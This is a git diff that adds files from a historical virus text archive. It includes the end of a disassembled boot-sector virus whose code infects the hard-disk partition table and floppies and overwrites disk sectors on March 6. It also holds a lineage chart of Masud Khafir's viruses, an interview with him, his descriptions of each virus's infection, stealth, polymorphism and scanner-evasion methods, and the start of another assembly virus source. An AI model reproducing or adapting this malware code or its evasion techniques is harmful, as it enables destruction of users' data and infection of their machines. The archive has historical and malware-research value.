+		pushf				; Push flags
+		call	dword ptr ds:data_9e	; (694E:000A=0)
+		jc	loc_5			; Jump if carry Set
+		mov	si,3BEh
+		mov	di,1BEh
+		mov	cx,21h
+		cld				; Clear direction
+		rep	movsw			; Rep while cx>0 Mov [si]
+		mov	ax,301h                 ; to es:[di]
+		xor	bx,bx			; Zero register
+		mov	cx,1
+		xor	dx,dx			; Zero register
+		pushf				; Push flags
+		call	dword ptr ds:data_9e	; (694E:000A=0)
+loc_5: ;Clear all set
+		pop	di
+		pop	si
+		pop	es
+		pop	ds
+		pop	dx
+		pop	cx
+		pop	bx
+		pop	ax
+		retn
+loc_6: ;Load all hiden data
+		xor	ax,ax			; Zero register
+		mov	ds,ax
+		cli				; Disable interrupts
+		mov	ss,ax
+		mov	ax,7C00h
+		mov	sp,ax
+		sti				; Enable interrupts
+		push	ds
+		push	ax
+		mov	ax,ds:data_1e		; (0000:004C=1DB1h)
+		mov	ds:data_5e,ax		; (0000:7C0A=49EBh)
+		mov	ax,ds:data_2e		; (0000:004E=70h)
+		mov	ds:data_6e,ax		; (0000:7C0C=2A3Ch)
+		mov	ax,ds:data_3e		; (0000:0413=280h)
+		dec	ax
+		dec	ax
+		mov	ds:data_3e,ax		; (0000:0413=280h)
+		mov	cl,6
+		shl	ax,cl			; Shift w/zeros fill
+		mov	es,ax
+		mov	ds:data_4e,ax		; (0000:7C05=203Ch)
+		mov	ax,0Eh
+		mov	ds:data_1e,ax		; (0000:004C=1DB1h)
+		mov	ds:data_2e,es		; (0000:004E=70h)
+		mov	cx,1BEh
+		mov	si,7C00h
+		xor	di,di			; Zero register
+		cld				; Clear direction
+		rep	movsb			; Rep while cx>0 Mov [si]
+		jmp	dword ptr cs:data_11e	; to es:[di] (694E:7C03=0)
+		db	33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
+		db	0Eh, 1Fh, 0B8h, 1, 2, 0BBh      ;          cd 13
+		db	0, 7Ch, 8Bh, 0Eh, 8, 0
+		db	83h, 0F9h, 7, 75h, 7, 0BAh
+		db	80h, 0, 0CDh, 13h, 0EBh, 2Bh
+		db	8Bh, 0Eh, 8, 0, 0BAh, 0
+		db	1, 0CDh, 13h, 72h, 20h, 0Eh
+		db	7, 0B8h, 1, 2, 0BBh, 0
+		db	2, 0B9h, 1, 0, 0BAh, 80h
+		db	0, 0CDh, 13h, 72h, 0Eh, 33h
+		db	0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
+		db	4Fh, 0ADh, 3Bh, 47h, 2
+		db	75h, 49h
+loc_7:;check if it is time to nuke
+		xor	cx,cx			; Zero register
+		mov	ah,4
+		int	1Ah ; Real time clock   ah=func 04h don't work on an xt
+						; read date cx=year, dx=mon/day
+		cmp	dx,306h                 ; See if March 6th
+		je	loc_8			; Jump if equal to nuking subs
+		retf				; Return to launch command.com
+loc_8:;get ready
+		xor	dx,dx			; Zero register
+		mov	cx,1
+loc_9:;run 7 times nuke 31.5 megs of hd
+		mov	ax,309h
+		mov	si,ds:data_8e		; (694E:0008=0)
+		cmp	si,3
+		je	loc_10			; Jump if equal
+		mov	al,0Eh
+		cmp	si,0Eh
+		je	loc_10			; Jump if equal
+		mov	dl,80h
+		mov	byte ptr ds:data_7e,4	; (694E:0007=0)
+		mov	al,11h
+loc_10: ;nuke away 
+		mov	bx,5000h
+		mov	es,bx
+		int	13h			; Disk  dl=drive a: ah=func 03h
+						;  write sectors from mem es:bx
+		jnc	loc_11			; Jump if carry=0
+		xor	ah,ah			; Zero register
+		int	13h			; Disk  dl=drive a: ah=func 00h
+						;  reset disk, al=return status
+loc_11: ;rest for loc-9 nuking
+		inc	dh
+		cmp	dh,ds:data_7e		; (694E:0007=0)
+		jb	loc_9			; Jump if below
+		xor	dh,dh			; Zero register
+		inc	ch
+		jmp	short loc_9		; (0250)
+loc_12:;time to infect a floppie or hard dirve
+		mov	cx,7
+		mov	ds:data_8e,cx		; (694E:0008=0)
+		mov	ax,301h
+		mov	dx,80h
+		int	13h	; Disk  dl=drive a: ah=func 03h infect flopie
+						;  write sectors from mem es:bx
+		jc	loc_7			; Jump if carry Set
+		mov	si,3BEh
+		mov	di,1BEh
+		mov	cx,21h
+		rep	movsw			; Rep while cx>0 Mov [si]
+		mov	ax,301h                 : to es:[di]
+		xor	bx,bx			; Zero register
+		inc	cl
+		int	13h ; Disk  dl=drive a: ah=func 03h lets infect hd
+						;  write sectors from mem es:bx
+;*		jmp	short loc_13		;*(02E0)
+		db	0EBh, 32h
+		db	1, 4, 11h, 0, 80h, 0
+		db	5, 5, 32h, 1, 0, 0
+		db	0, 0, 0
+		db	53h, 53h, 20h, 20h, 43h, 4Fh
+		db	4Dh
+		db	58 dup (0)
+		db	55h, 0AAh
+  
+seg_a		ends
+
+;Last notes this virus looks like a poor hack job on the stoned virus.
+;It is kinda cool in the fact that it is hard to get out of the partition table
+;even if you nuke the partition table it will live on even if you replace it.
+;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
+;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
+;this virus uses int 1ah which doesn't work on an XT system.
+;the virus isn't actually 512 but that is how much it writes.
+;it moves the boot area of a floppy to the last sector on the disk
+;and on a harddrive it moves it to the last sector in the root directory
+;This should show you all how much the media can over do it on things
+;since this is really a lame virus,to tell you the truth there is a lot better
+;ones out there.
+;This in no way is a complete listing of the code for the virus.
+;Nor is it the best since i'm not the best at Assembly.
+;Done by Visionary.
+;BTW to who ever wrote this virus... Get a life!  
+
+-------------------------------------------------------------------------------
+Downloaded From P-80 Systems 304-744-2253
diff --git a/textfiles.com/virus/mk-chart.txt b/textfiles.com/virus/mk-chart.txt
new file mode 100644
index 00000000..f035a22b
--- /dev/null
+++ b/textfiles.com/virus/mk-chart.txt
@@ -0,0 +1,73 @@
+
+              Virus relationship charts of Masud Khafir's viruses
+              ===================================================
+
+
+
+Gotcha F  (732)
+  ��� Gotcha E  (607)
+  ��� Gotcha A  (879)
+        ��� Gotcha B  (881)
+              ��� Gotcha C  (906)
+                    ��� Gotcha D  (627)
+                          ��� Pogue
+                          ��� Legalize
+                                ��� Coffeeshop 1
+                                      ��� Coffeeshop 2
+                                      ��� Coffeeshop 3  (Girafe A)
+                                            ��� Coffeeshop 4  (Girafe B)
+                                                  ��� Cruncher 1.0
+                                                  �     ��� Cruncher 2.0
+                                                  �           ��� Cruncher 2.1
+                                                  ��� PlayGame
+                                                  ��� Bosnia
+
+
+Seventh son 350
+  ����� Seventh son 332
+          ����� Seventh son 284
+                  ����� DOS-1
+
+
+Little Brother 299
+  ����� Little Brother 307
+  �       ����� Little Brother 321
+  �       ����� Little Brother 349  (Vote)  (*)
+  �               ����� Little Brother 361  (Vote-Erase)  (*)
+  ����� Little Brother 300  (*)
+
+
+Cannabis 1
+  ����� Cannabis 2
+          ����� Cannabis 3
+                  ����� Cannabis 4  (*)
+
+
+Dutch Tiny 126
+  ����� Dutch Tiny 124
+  �       ����� Dutch Tiny 122
+  ����� Dutch Tiny 124B
+
+
+Dutch Mini 99
+  ����� Dutch Mini 97
+          ����� Dutch Mini 91
+          ����� Dutch Mini 117
+          ����� Dutch Mini 111
+
+
+46-Virus
+  ����� PCA virus
+
+
+ANSI-Virus
+
+Virus_for_Windows 1.4
+
+MK-Worm
+
+
+
+
+(*) Note: The viruses marked with (*) are NOT written by Masud Khafir!
+
\ No newline at end of file
diff --git a/textfiles.com/virus/mkinterv.iew b/textfiles.com/virus/mkinterv.iew
new file mode 100644
index 00000000..4b838f68
--- /dev/null
+++ b/textfiles.com/virus/mkinterv.iew
@@ -0,0 +1,304 @@
+--------------------------------------------------------------------------------
+           INTERVIEW WITH MASUD KHAFIR / TRIDENT / THE NETHERLANDS
+--------------------------------------------------------------------------------
+
+ Give me a short description of who you are!
+
+- I am Masud Khafir, virus writer. 
+  Age: twenty-something.
+  Country: The Netherlands
+  That's about all that I want to reveal about my identity.
+
+ From where did you get your handle, Masud Khafir?
+
+- 'Masud' is a common name in the middle east. I chose that name in the
+  spring of 1991, when the kurdish rebellion in iraq was active. Their
+  leader was Masud Barzani. There are more rebel leaders with that name:
+  Masud Rajavi, leader of the Iranian Mujahedin e Khalq and Ahmad Shah
+  Masud, one of the Afghan rebel leaders. 'Khafir' is a word I once
+  found in the dictionary. It's arab and is a rude word for non-muslims.
+  In the south-african language it's 'kaffir' and means 'nigger'. In
+  Holland it is 'kaffer' and is used for calling someone an idiot. I
+  found it a funny word, because of its strange history.
+
+ When did you discovered the world of computers?
+
+- A long time ago. My first computer was a C-64. That was about 10
+  years ago. But I have even programmed before that time.
+
+ How long have you been active in the scene?
+
+- Like I said, I started in the spring of 1991. That's allmost 3
+  years now.
+
+ How did you came into the virus business?
+
+- It started when I got a virus from a friend. I dissasembled that
+  virus and after that I was wondering if I could write one myself.
+  In the same time I started reading the virus areas on fidonet and
+  there I read about Todor Todorov's Virus eXchange BBS. I was very
+  curious about that and so I called it a few times. That's how I got
+  into the scene.
+
+ Positive/negative aspects of the scene?
+
+- I think that the attitude towards the AV community is sometimes a bit
+  too hostile. I see it more like a chessgame, they are our opponents,
+  but we don't have to be enemies. Many of them are just nice people.
+  But of course the same is true for the other side. Some of them just
+  hate us. What I also don't like is the negative image of the scene,
+  that adolescent rebellious attitude and creating an image of oneself
+  as evil and dangerous. But that's just my personal opinion. This
+  also means that I don't like destructive viruses.
+
+ Have you been involved in any other group than Trident?
+	    
+- No.
+
+ Who started/created Trident?
+
+- It was started by John Tardy.
+
+ What's the groups goal?
+
+- I think the main goal is to keep in touch with each other. There's not
+  a big cooperation on writing viruses. Everybody does its own things.
+
+ How many people are you?
+
+- About between 5 and 10.
+
+ Do all of them program, if not, what's the others job?
+
+- It's mainly a programmers group. But there are some non-writers
+  affiliated with the group.
+
+ How is Trident (currently) organzied?
+
+- There is no real organisation. It's mainly a group of friends.
+
+ Have you got any contacts with other virus-groups/programmers?
+
+- Some of us have contacts with others. At this moment we can have
+  access to Nuke-net.
+
+ Can anyone ask for membership, or are you a "private" group?
+
+- I guess we are more or less a private group. There have been new
+  members in the past. In that case we just all agreed. At this moment
+  we don't feel to expand.
+
+ You've programmed aloth of polymorphic things, and one of them is the
+ Trident Polymorphic Engine, what comments have you recieved about it?
+
+- Well, various. I have not had that many personal responses, as I am
+  not too easy to reach. But it has got quite some attention in the
+  virus/antivirus world. It's also one of the things that made the
+  name Trident known in the scene.
+
+ Will you continue to "upgrade" it, or is it a finished project?
+
+- TPE is now finished. The first versions all had some bugs. I thought
+  that version 1.3 would be the last one, but that one still had a small
+  bug. Version 1.4 seems to be okay, as far as I know now. Besides, I
+  don't think I would want to put out a new version again, anymore.
+
+ How many strains/mutations can it produce?
+
+- I have no idea. Enough, I think. The most important thing is that the
+  decryptors can not be found with wildcard scanstrings. That's the main
+  idea behind polymorphism. In version 1.4 I also enhanced the way in
+  which it encrypts, because this was a weak point.
+
+ Even thought polymorphic engine's are a great thing, not many people
+ seems to use them? You have any theorie why they don't?
+
+- I think most people just want to make their own things, rather than
+  use someone else's products. And maybe because antivirus writers have
+  been quite succesful in finding ways to detect them.
+
+ Which is the best polymorphic engine around today?
+
+- It's hard to say. I've seen several of them but I haven't done a real
+  close study on any of them. Each of them has its strong and weak
+  points, I think. Of course there are not only the engines, but also
+  a lot of other polymorphic viruses, like V2P*, Maltese Amoeba,
+  Uruguay, etc. TPE started this way too. Some of these viruses are
+  just as advanced as the engines. But none of those engines and viruses
+  is perfect. For every one of them the AV people have found a solution.
+
+ Have you ever thought of/are you currently releasing some sort of
+ electronic magazine (text/executable/hard-copy)
+
+- Yes, we have been thinking about that. But we didn't have enough good
+  ideas (and are too lazy) to write enough articles. We rather write
+  code than text. We couldn't even agree on the title...
+
+ Are you into other things such as hacking and phreaking aswell, or
+ just viruses?
+
+- I once was interrested in things like hacking etc. But I'm not
+  involved in that scene now.
+
+ Can you name a few viruses/engines you in person have written?
+
+- The most known are: Gotcha, 7th son, Little Brother, Pogue,
+  CoffeeShop, WinVir, TPE, Cruncher, PlayGame, etc..
+
+ Which one was the hardest to write?
+
+- Probably the first one: Gotcha. WinVir and Cruncher were quite
+  hard too.
+
+ Do you have any sort of company or law-enforcement who are trying
+ to hunt Trident down?
+
+- Perhaps. This could be possible. Anyway, we keep cautious, because
+  you never know...
+
+ If so, are they a real threat or just "childish"?
+
+- There is a new law against various computer crimes since 1 march 1993.
+  Writing a virus is not illegal. Distributing viruses in any way can be
+  illegal. The law is not very clear about this. If we as writers
+  exchange viruses amongst each others, that could perhaps be
+  interpreted as something illegal. Last year another guy in Holland
+  was arrested for hacking, and although he hasn't been convicted for
+  anything yet, the law enforcement has been quite tough on him. So
+  they certainly can make  your life hard if they want to.
+
+ Have you ever had any trouble in the group with the result of
+ kicked members?
+
+- No.
+
+ How good are Trident comparing to other groups?
+
+- Well, I leave that to others to decide.
+
+ Do you have any couriers that spread your products around?
+
+- We don't spread our viruses in the wild. But we do exchange them
+  with other people in the virus scene.
+
+ What do you think about the laws against h/p/v that has arrived
+ lately?
+
+- They were inevitable. I don't know much about the laws in other
+  countries, but I think here they are too tough. The penalties are
+  too high. OK, these things we do might be naughty, but they not
+  crimes.
+
+ What do you think about various news-papers thinking us as nerds?
+
+- They have used the same cliche's before for computer freaks in
+  general. I don't know, maybe it is true for some. At least I think
+  most of us are young, male, IQ>100, interested in technical stuff,
+  etc. But that doesn't mean that we're nerds. The people that I know
+  aren't.
+
+ Has the scene in any way influented on your real life?
+
+- No, not really.
+
+ Would you feel guilty if one of your viruses made damage to a
+ hospital?
+
+- Yes, I would. For that reason I don't write viruses that destroy data.
+  I usualy don't spread them in the wild at all. I only did that once,
+  when I was in a bad mood. I don't wanna cause other people trouble.
+  For me creating them is the most important thing. But of course I
+  also like it if they get some worldwide attention. That's human
+  nature, I guess. That's why I don't mind if AV people get them.
+  But I don't see a problem in giving them to VX people either,
+  because my experience is that viruses in the VX scene very rarely
+  leak out in the wild.
+  
+ Do you see any differences between the scene now and a couple of
+ years ago (concerning the underground part ofcause)?
+
+- The scene is growing and there are more contacts between each other.
+  A few years ago it was much harder to get in contact with other virus
+  writers.
+
+ Which virus-magazine do you think is the best avalible now-a-days?
+
+- I think my favorite is 40hex.
+
+ Which virus-group/programmer do you admire/like?
+
+- Of course Dark Avenger was one of the best, maybe the best. He often
+  introduced new techniques. I also people like Dark Angel from P/S.
+  But to be honest, I don't often take a deep look at other viruses
+  anymore these days.
+
+ Which country is the best virus-writing today (Before it was
+ Bulgaria, maybe changed)?
+
+- I haven't heard anything from Bulgaria for a long time. Sometimes I
+  have some nostalgia for the times when Bulgaria was the virus centre
+  of the world. :-) Today it's probably the USA, because they're the
+  biggest country in the west. I think it's strange we don't hear that
+  much about Russia.
+
+ What do you think about these virus generators, such as VCL and PS-MPC?
+
+- They are funny things. I like them for what they can do, for the
+  technical side of it.
+
+ What do you think about the people using them?
+
+- It's nice to experiment a bit with them, but creating a virus this
+  way is defenitly not something to be proud of.
+
+ What do you think about people bragging over (almost) nothing and
+ ragging with other groups aswell?
+
+- I think they're giving the virus scene a bad name.
+
+ What do you think about such individes as board-crashers?
+
+- I don't know any of them, but I think it's rather lame.
+
+ Describe the perfect virus :
+
+- One that is totally bug-free. One that is 100% compatible with all
+  programs and doesn't for example crash the computer is you start
+  Windows.
+
+ Describe the perfect viruscoder :
+
+- One that invents new techniques. One that can defeat the anti-virus
+  programs.
+
+ Describe the AV-community with a few lines :
+
+- We need them. I think every virus writer uses AV programs.
+  It is nice when a virus can be smarter than the current AV software,
+  but it would be scary if they wouldn't be able to find a solution for
+  it. But it's a shame that some AV people hate us.
+
+ Which AV-program do think is the best, and why?
+
+- I like TBscan a lot, mainly for its heuristic features. And it's
+  fast. F-prot is best in identifying viruses and it's very user
+  friendly. I also like AVP from russia. Sometimes it's a bit slow,
+  but it is very powerful. It also has a very nice info section.
+  
+ What do you think about the underground's future?
+
+- I think it will continue to grow, but perhaps it will get less
+  exciting. Viruses are not as special and mysterious anymore as
+  they were before.
+
+ Do you know/heard of any new technics coming in the near future?
+
+- No, I wish I knew...
+
+ Any advice to people who want's to learn the basic of virus-writing?
+
+- Take a good look at other viruses and sources. Try to understand
+  their weak and their strong points. Test your stuff before you give
+  it away, because it's a shame to have dozens of bug-fix updates for
+  the same virus. Do it for the fun of it, and not to cause other
+  people trouble. And try to be original.
\ No newline at end of file
diff --git a/textfiles.com/virus/mkvirlst.txt b/textfiles.com/virus/mkvirlst.txt
new file mode 100644
index 00000000..d52400fa
--- /dev/null
+++ b/textfiles.com/virus/mkvirlst.txt
@@ -0,0 +1,450 @@
+Gotcha 1
+
+   This was the first virus I wrote. It is a resident COM and EXE infector.
+   It infects programs when they are executed. It hides at the top of
+   conventional memory. When infecting it intercepts INT24, circumvents
+   the read-only attribute and disables Ctrl-Break. It also restores the
+   original file date and time after the infection. Some parts of it were
+   taken from the Yankee Doodle virus, but nevertheless this is an enterly
+   new virus.
+
+
+Gotcha 4
+
+   This is a resident COM infector. It is a stripped-down variant of
+   version 1. The special thing about this virus is that it contains
+   scan-strings of a few other viruses. These scan-strings are encrypted
+   and in every infected file one of them is decrypted. So scanners can be
+   fooled to think that there are up to 8 differrent other viruses in case
+   a lot of files have been infected with this virus.
+
+
+Gotcha 6
+
+   This version is the follow-up of version 1. This one has some additional
+   features. It can also infect files when they are opened, it avoids to
+   infect files matching the name *AN*.* (like SCAN.EXE, CLEAN.EXE,
+   TBSCAN.EXE etc...) and it won't infect files when the DOS environment
+   contains "E=mc�".
+ 
+
+Gotcha 7
+
+   This is a minor bug-fix of version 6. 
+
+
+Gotcha 9
+
+   In this next version a few bugs are removed and the code has been made
+   a little bit efficient. It can also infect files on more different DOS
+   funcions like rename (56h), attribute (43h), findfirst (4Eh) and many
+   others. It now also avoids files matching the name V*.* (like VIRX.EXE,
+   VSHIELD.EXE, etc..).
+
+
+Gotcha 17
+
+   This version is quite different from the others. It uses another technique
+   to access files, similar as many bulgarian viruses (like 512). Also other
+   things are made more efficient. This one only infects files when they are
+   executed or closed. It now also avoids files matching the name F*.*.
+
+
+46 Virus
+
+   This is an extremely simple virus. It just overwrites all COM files in
+   it's directory with a copy of itself. It's length is 46 bytes, hence the
+   name.
+
+
+Seventh Son 1
+
+   This is a simple non-resident COM infecting virus. It will infect all
+   other COM files in it's directory. It circumvents read-only attributes,
+   intercepts INT24, disables Ctrl-break and keeps the original file date
+   and time when infecting. The virus contains a generation counter. If
+   both his own and the previous generation are 7, it will display the text
+   "Seventh son of a seventh son" on the screen. This virus was named after
+   an Iron Maiden song (yes, I admit, not very original).
+
+
+Seventh Son 2
+
+   This version is a little bit smaller and more efficiently coded. This
+   virus alsos contain the text 'Virus' in cyrilic (�����) at the end. This
+   has no special purpose. Just to confuse some people.
+
+
+Seventh son 4
+
+   This version is again made smaller and more efficient.
+
+
+Little Brother 1
+
+   This is a resident spawning EXE infector. It infects EXE files by
+   creating a COM file with the same name, without touching the EXE file.
+   The COM file only contains the complete virus. The first time the virus
+   is executed it will install itself in an unused part of memory (and not
+   run the original program). When DOS wants to execute a program, the virus
+   uses a clumsy algorithm to decide whether a COM or an EXE file should be
+   executed.
+
+
+Little Brother 2
+
+   In this version a few bugs are removed and it is also a bit more
+   efficiently coded.
+
+
+Little Brother 3
+
+   This version works a little bit different than the previous two. This
+   one doesn't use the resident algorithm anymore to decide wether to
+   execute a COM or an EXE file. Instead the original EXE program is
+   spawned from the COM program (the virus).
+
+
+Tiny 126
+
+   This is a small resident COM infecting virus. It is written as an attempt
+   to write the smallest possible virus. The length of this virus is 126
+   bytes. It does NOT re-infect programs that are already infected. This
+   virus hides in memory at address 0050:0100.
+
+
+Tiny 124
+
+   This one is exactly the same as the previous one, only it hides at address
+   0000:0100. That location is part of the interrupt area, and because of
+   that this virus is very unstable. It crashes very often, but nevertheless
+   it is able to infect files.
+
+
+Tiny 124B
+
+   This is a variant of version 126. It will not infect COM files that begin
+   with a near JMP (E9h). This version has a disadvantage that it also tries
+   to infect EXE files. Infected EXE files will not function anymore.
+
+
+Tiny 122
+
+   This one is based on version 124. It has the same disadvantage as
+   version 124B.
+
+
+Mini 99
+
+   This is a small non-resident COM infecting virus. Like the previous
+   mentioned viruses, this one too was written as an attempt to write the
+   smallest possible virus. A big part of the code is similar although it
+   is a different type of virus. This virus will infect all COM files in
+   it's directory.
+
+
+Mini 97
+
+   This version is 2 bytes smaller. It will not infect COM files that begin
+   with a near JMP (E9h).
+
+
+Mini 91
+
+   This version only tries to infect the first COM file in it's directory.
+
+
+Mini 117
+
+   This one is a little bit improved variant. It will infect only the first
+   uninfected COM file in it's directory (if the first one is infected it
+   will infect the second one).
+
+
+Mini 111
+
+   This is an improved version of Mini 97. This one will keep the original
+   DTA area, so programs that use command-line input will still function.
+
+
+Cannabis 1
+
+   This is an overwriting floppy bootsector virus. It is a sort of
+   combination of a (simplified) bootsector and a virus. Instead of
+   keeping the original bootsector somewhere else on the disk, it just
+   overwrites the original bootsector. When an infected floppy is booted,
+   the virus installs itself in memory and then prints the message
+   "Non-System disk or disk error  Replace and press a key when ready" on
+   the screen. Then it tries to boot again. One has to boot from another
+   disk or from harddisk to continue. But the virus will stay resident
+   in memory. Sometimes the virus will print the message "Hey man, I don't
+   wanna work. I'm too stoned right now..." on the screen when booting, and
+   the computer will then hang.
+
+
+Cannabis 2
+
+   Unlike the previous version, this one is able to boot from the infected
+   disk, just like normal bootsectors. It doesn't contain the part that
+   writes the "Hey man..." message anymore.
+
+
+Cannabis 3
+
+   This is a minor bug-fix of version 2. The previous versions had a serious
+   bug that they sometimes wrote to the wrong side of the floppy.
+
+
+Pogue Mahone
+
+   This one is the most famous virus of this collection. It is a resident
+   COM infecting virus. It's based on the last version of the Gotcha virus.
+   The most remarkable thing about this virus is that it uses the Mutation
+   Engine (MtE). The Mutation Engine is a small module written by "Dark
+   Avenger", which can be included in viruses to make them polymorphic.
+   This virus does not infect files matching the name CO*.COM (like
+   COMMAND.COM). When the virus becomes resident between 1:00 and 9:00
+   it will play the song 'Streams of Whiskey' (by The Pogues!). On the first
+   of May it will play another song.
+
+
+Redhair ANSI bomb
+
+   This is not a virus but an ANSI bomb. Unlike most other bombs this one
+   does not destroy anything. This bomb is in fact both an ANSI picture and
+   a COM file. The COM file is infected with the MINI-117 virus. When the
+   ANSI bomb triggers (when the backslash key is pressed) it will rename
+   itself to X.COM and then execute X.COM. So the virus is then activated!
+   After that it changes it's name back to REDHAIR.ANS.
+
+
+ANSI virus
+
+   This is another program that uses ANSI techniques. It's not just an ANSI
+   bomb but an ANSI virus! Many people think ANSI viruses don't exist, but
+   this one proves them wrong. This one uses the same trick as Redhair, it's
+   at the same time an ANSI picture and a COM program. When activated, it
+   will overwrite one .ANS file in the directory with a copy of itself. It
+   adjusts the text in the virus to the victim's filename.
+
+
+Legalize
+
+   This is another virus that is based on Gotcha 17. It is a resident
+   COM and EXE infector. It doesn't infect CO*.*. The special thing about
+   this virus is that it will display a picture of a large green hemp leaf
+   when the virus becomes resident on fridays. After showing the picture,
+   the virus will ask the user a few questions about what he/she thinks
+   about legalizing cannabis. After this, the virus will quit to DOS.
+   The picture in the virus is packed with DIET to keep the virus small.
+   A few small bugs from Gotcha 17 are fixed in this virus, but unfortunatly
+   this virus has a new bug which causes some infected EXE programs to crash.
+
+
+Coffeeshop 1
+
+   This one is based on Gotcha 17 and Legalize. Originally it was planned
+   to be a final bug-free version of Gotcha, but later I put the picture
+   routine from Legalize in it. Although it is based on Gotcha 17, a large
+   part of it has changed. It infects COM or EXE files when it is executed
+   or opened with DOS function 6C00h. It avoids to infect several known
+   programs that use a self-check (like most virus scanners). It also doesn't
+   infect several other files, like Windows files, files with internal
+   overlays etc. The virus doesn't use any undocumented features of DOS
+   anymore. I wanted it to be as compatible as possible. The picture routine
+   is also improved. It activates on fridays on a pseudo-random base when the
+   virus becomes resident. It will then show the big green hemp leaf and
+   after that it will continue with the original program (unlike Legalize).
+
+
+Coffeeshop 2
+
+   This virus is very similar to the previous one, but with MtE included.
+   It only infects EXE files. At the time this virus was made a lot of
+   scanners claimed that they were able to detect MtE, but none of them
+   could detect this virus.
+
+
+Coffeeshop 3
+
+   This one too is very similar to the previous ones. Like version 2,
+   this one is also highly polymorphic. But instead of using MtE, I wrote
+   the encrytion routine myself. It infects both COM and EXE files.
+
+
+Coffeeshop 4
+
+   This is a minor bugfix of version 3. This one can also activate when
+   the virus is already resident.
+
+
+Virus_for_Windows 1.4
+
+   This is a primitive non-resident virus that only infects Windows EXE
+   program. As far as I know this is the first known Windows virus. It
+   will try to infect all Windows EXE files in its directory. This virus
+   has a big problem, it is not able to execute the original program.
+   As a solution to this the virus will disinfect itself after infecting
+   the other programs. So one has to execute infected programs twice to
+   execute the original program. This virus will only infect programs which
+   have a big enough data-segment.
+
+
+MK Worm
+
+   This is not a real virus, but some simple kind of worm. It does not
+   infect programs in any way. Instead it will only copy itself to a few
+   other directories on the disk from which it was executed. Each variant
+   will have a different name and also their lenghts will be slightly
+   different. It can spread because many people are used to try out every
+   new executable file they get, and many people often use the command
+   'COPY *.*'.
+
+
+Cruncher 1.0
+
+   This is a virus that uses data-compression. It is a resident COM
+   infector, based on the Coffeeshop series. It compresses the victim file
+   after infection. So the virus will be compressed together with the
+   original program. The compression algorithm is the same as that of the
+   program 'Diet'.
+
+
+Cruncher 2.0
+
+   This version also infects EXE files.
+
+
+Cruncher 2.1
+
+   This version is almost equal to version 2.0 but this one asks permission
+   from the user before going resident. This feature changes it from a 
+   naughty virus into a userfriendly automatic compression utility!
+
+
+TPE 1.1
+
+   This is an OBJ module that can be linked to a virus to make it
+   polymorphic. It can be used in a similar way as the famous MtE
+   module. The encryption routine of TPE is taken from Coffeeshop
+   version 3/4. 
+
+
+TPE 1.2
+
+   This is a bugfix. The previous version often produced decryption
+   routines that didn't work on all processor types.
+
+
+TPE 1.3
+
+   This is a another bugfix. This version is made fully relocatable
+   within a memory segment, which is very handy for non-resident
+   viruses. Also another incompatibility bug is fixed.
+
+
+TPE 1.4
+
+   In this version the encryption/decryption algorithms are made more
+   complex. The previous versions could be detected by decrypting the
+   encrypted code. 
+
+
+PlayGame
+
+   This is a semi-stealth multi-partite EXE-infector. This virus infects
+   the master bootsector of the harddisk when an infected program is
+   executed. The virus only uses stealth techniques when a known anti-virus
+   program is executed or at the 'DIR' command. The payload of this virus
+   is a little arcade game that the user can play for fun. It activates in
+   december after 21:00. 
+
+
+DOS-1
+
+   This is a simple non-resident COM infector. It uses only FCB function
+   calls, so it is compatible with all previous DOS versions, including
+   version 1.0.
+
+
+Bosnia
+
+   This is a variant of Coffeeshop 3/4, but with another picture routine.
+   The TPE 1.4 module is linked with this virus.
+
+
+PCA virus
+
+   This is a very simple overwriting virus. After infecting it shows a
+   picture of the mascotte of the dutch magazine "PC Active". The picture
+   inside the virus is compressed in a special way, to keep the virus
+   small.
+
+
+==============================================================================
+
+                         Virus Characteristics List
+
+
+ANSI keyboard remap-------------------+
+Polymorphic-------------------------+ |
+Infects Windows EXE files---------+ | |
+Infects EXE files---------------+ | | |
+Infects COM files-------------+ | | | |
+Memory Resident-------------+ | | | | |
+Overwriting---------------+ | | | | | |
+Bootsector virus--------+ | | | | | | |
+                        | | | | | | | |
+                        V V V V V V V V      Length
+---------------------------------------------------
+Gotcha 1                . . R C E . . .         732
+Gotcha 4                . . R C . . . .         607
+Gotcha 6                . . R C E . . .         879
+Gotcha 7                . . R C E . . .         881
+Gotcha 9                . . R C E . . .         906
+Gotcha 17               . . R C E . . .         627
+46 Virus                . O . C . . . .          46
+Seventh Son 1           . . . C . . . .         350
+Seventh Son 2           . . . C . . . .         332
+Seventh Son 4           . . . C . . . .         284
+Little Brother 1        . . R . E . . .         299
+Little Brother 2        . . R . E . . .         307
+Little Brother 3        . . R . E . . .         321
+Tiny 126                . . R C . . . .         126
+Tiny 124                . . R C . . . .         124
+Tiny 124B               . . R C E . . .         124
+Tiny 122                . . R C E . . .         122
+Mini 99                 . . . C . . . .          99
+Mini 97                 . . . C . . . .          97
+Mini 91                 . . . C . . . .          91
+Mini 117                . . . C . . . .         117
+Mini 111                . . . C . . . .         111
+Cannabis 1              B O R . . . . .         512
+Cannabis 2              B O R . . . . .         512
+Cannabis 3              B O R . . . . .         512
+Pogue Mahone            . . R C . . P .        3017+
+Redhair ANSI bomb       . . . . . . . A           -
+ANSI virus              . O . . . . . A         881
+Legalize                . . R C E . . .        1781
+Coffeeshop 1            . . R C E . . .        1568
+Coffeeshop 2            . . R . E . P .        3792+
+Coffeeshop 3            . . R C E . P .        3000+
+Coffeeshop 4            . . R C E . P .        3000+
+Virus_for_Windows 1.4   . . . . . W . .         854
+MK Worm                 . . . . . . . .         715+
+Cruncher 1.0            . . R C . . . .        2092-
+Cruncher 2.0            . . R C E . . .        4000-
+Cruncher 2.1            . . R C E . . .        4800-
+TPE 1.1                 . . . . . . P .        1378
+TPE 1.2                 . . . . . . P .        1355
+TPE 1.3                 . . . . . . P .        1411
+TPE 1.4                 . . . . . . P .        1637
+PlayGame                B . R . E . . .        2000
+Dos-1                   . . . C . . . .         184
+Bosnia                  . . R C E . P .        3112+
+PCA virus               . O . C . . . .         342
+
+;  �������������������������������������������������������������������������
+;  ���������������> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <���������������
+;  �����������> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <�����������
+;  �������������������������������������������������������������������������
diff --git a/textfiles.com/virus/necro.a86 b/textfiles.com/virus/necro.a86
new file mode 100644
index 00000000..3e633da4
--- /dev/null
+++ b/textfiles.com/virus/necro.a86
@@ -0,0 +1,395 @@
+; A86 SOURCE CODE for:
+;
